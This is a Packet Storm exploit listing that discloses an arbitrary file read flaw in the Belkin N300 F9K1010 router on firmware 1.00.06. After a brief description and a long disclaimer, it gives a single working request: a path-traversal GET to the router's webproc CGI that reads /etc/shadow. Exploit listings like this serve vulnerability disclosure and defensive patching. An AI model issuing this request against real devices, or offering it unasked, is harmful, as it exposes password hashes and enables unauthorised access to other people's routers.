Belkin N300 Wifi N Router F9K1010 Arbitrary File Disclosure

2015-10-10T00:00:00
ID PACKETSTORM:133913
Type packetstorm
Reporter Todor Donev
Modified 2015-10-10T00:00:00

Description

                                        
                                            `# Belkin N300 WiFi N Router F9K1010  
# Arbitrary File Disclosure  
#  
# Copyright 2015 (c) Todor Donev  
# todor.donev@gmail.com  
# http://www.ethical-hacker.org/  
# https://www.facebook.com/ethicalhackerorg  
# http://pastebin.com/u/hackerscommunity  
#  
# Version Info:  
# Firmware Version F9K1010_WW_1.00.06  
# Hardware F9K1010 v1  
# Boot Version v1.0.0  
#  
# Description:  
# This vulnerability in the Belkin routers could   
# allow an attacker to read the contents of   
# arbitrary files. The vulnerability is due to   
# incomplete input validation. An attacker could   
# exploit this vulnerability by issuing a full   
# path to files.  
#  
# Disclaimer:  
# This or previous program is for Educational  
# purpose ONLY. Do not use it without permission.  
# The usual disclaimer applies, especially the  
# fact that Todor Donev is not liable for any  
# damages caused by direct or indirect use of the  
# information or functionality provided by these  
# programs. The author or any Internet provider  
# bears NO responsibility for content or misuse  
# of these programs or any derivatives thereof.  
# By using these programs you accept the fact  
# that any damage (dataloss, system crash, system   
# compromise, etc.) caused by the use of these   
# programs is not Todor Donev's responsibility.  
#  
# Use at your own risk and educational purpose   
# ONLY!  
#  
[todor@adamantium ~]$ GET "http://TARGET/cgi-bin/webproc?getpage=../../../../../../../../../../etc/shadow"  
`